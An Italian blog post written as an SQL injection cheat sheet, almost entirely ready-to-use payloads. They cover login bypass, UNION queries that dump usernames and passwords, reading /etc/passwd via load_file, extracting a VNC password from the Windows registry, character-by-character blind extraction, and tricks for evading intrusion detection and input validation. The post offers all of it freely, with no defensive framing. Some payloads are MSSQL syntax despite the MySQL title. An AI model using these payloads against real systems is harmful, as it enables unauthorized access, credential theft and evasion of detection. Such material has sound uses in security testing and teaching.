MySQL Injection deep analisys

 

Mysql Deep analisys


#sentiti libero di usare queste informazioni come meglio ti pare
#no copy no niente di niente

#Lo scopo di questo articolo è di elencare le principali tecniche di sql_injection
#valide per il software gestionale MySQL


Indice

1.   Tipi di Dati
2.   Test Vulnerabilità
3.   Raccolta informazioni
4.   MySQL OS
5.   Server name e configurazione.
6.   VNC password usando il registro di sistema
7.   IDS Signature Evasion.
8.   Eludere la validazione dell’input usando Char()
9.   IDS Signature Evasion utilizzando i commenti.
10. Stringhe senza quote.
11. Commenti
12. Numerazione delle colonne
13. Test funzione UNION
14. Versione database
15. Nome tabelle e colonne in mysql < 5
16. Tabelle e colonne mysql 5
17. Blind



1. Tipi di Dati

  • –>mysql.user
  • –>mysql.host
  • –>mysql.db


2. Test vulnerabilità

  • – Login:’ or 1=1–
  • – Pass:’ or 1=1–
  • – http://website/index.asp?id=’ or 1=1–
  • – ‘ having 1=1–
  • – ‘ group by userid having 1=1–
  • – ‘ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘tablename’)–
  • – ‘ union select sum(columnname) from tablename–


3. Raccolta  informazioni

  • – ‘ or 1 in (select @@version)–
  • – ‘ union all select @@version–


4. MySQL OS

  • – ‘ union select 1,load_file(‘/etc/passwd’),1,1,1;


5. Server name e configurazione.

  • – ‘ and 1 in (select @@servername)–


6. VNC password usando il registro di sistema

– ‘; declare @out binary(8)
– exec master..xp_regread
– @rootkey = ‘HKEY_LOCAL_MACHINE’,
– @key = ‘SOFTWAREORLWinVNC3Default’,
– @value_name=’password’,
– @value = @out output
– select cast (@out as bigint) as x into TEMP–
– ‘ and 1 in (select cast(x as varchar) from temp)–

 


7. IDS Signature Evasion.

Eludere ‘ OR 1=1

  • – ‘ OR ‘unusual’ = ‘unusual’
  • – ‘ OR ‘something’ = ‘some’+’thing’
  • – ‘ OR ‘text’ = N’text’
  • – ‘ OR ‘something’ like ‘some%’
  • – ‘ OR 2 > 1
  • – ‘ OR ‘text’ > ‘t’
  • – ‘ OR ‘whatever’ in (‘whatever’)
  • – ‘ OR 2 BETWEEN 1 and 3


8. Eludere la validazione dell’input usando Char()

Inject senza quote (string = "%"):
–> ‘ or username like char(37);
Inject con uso di quote (string="root"):
–> ‘ union select * from users where login = char(114,111,111,116);
caricare file con la union (string = "/etc/passwd"):
–>’ union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Verificare l’esistenza di un file(string = "n.ext"):
–>’ and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));


9. IDS Signature Evasion utilizzando i commenti.

  • –>’/**/OR/**/1/**/=/**/1
  • –>Username:’ or 1/*
  • –>Password:*/=1–
  • –>UNI/**/ON SEL/**/ECT


10. Stringhe senza quote.

–> INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72), 0x64)


11. Commenti

‘ /* ‘
‘ — ‘


12. Numerazione delle colonne

order by n
al primo errore n-1 è il numero di colonne


13. Test funzione UNION

union all select null,null,null/*


14. Versione database

union all select 1,@@version,3
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*


15. Nome tabelle e colonne in mysql < 5

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*


16. Tabelle e colonne mysql 5

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

17. Blind

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
http://www.site.com/news.php?id=5 and (select 1)=1
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
Primo carattere primo elemento tabella users
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
aumentare il valore di confronto > fino ad ottenere false, per il secondo carattere:
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

#ultima revisione 16/01/2010
#thanks to: * i bravi ragazzi 🙂

This entry was posted in WebApp Security. Bookmark the permalink.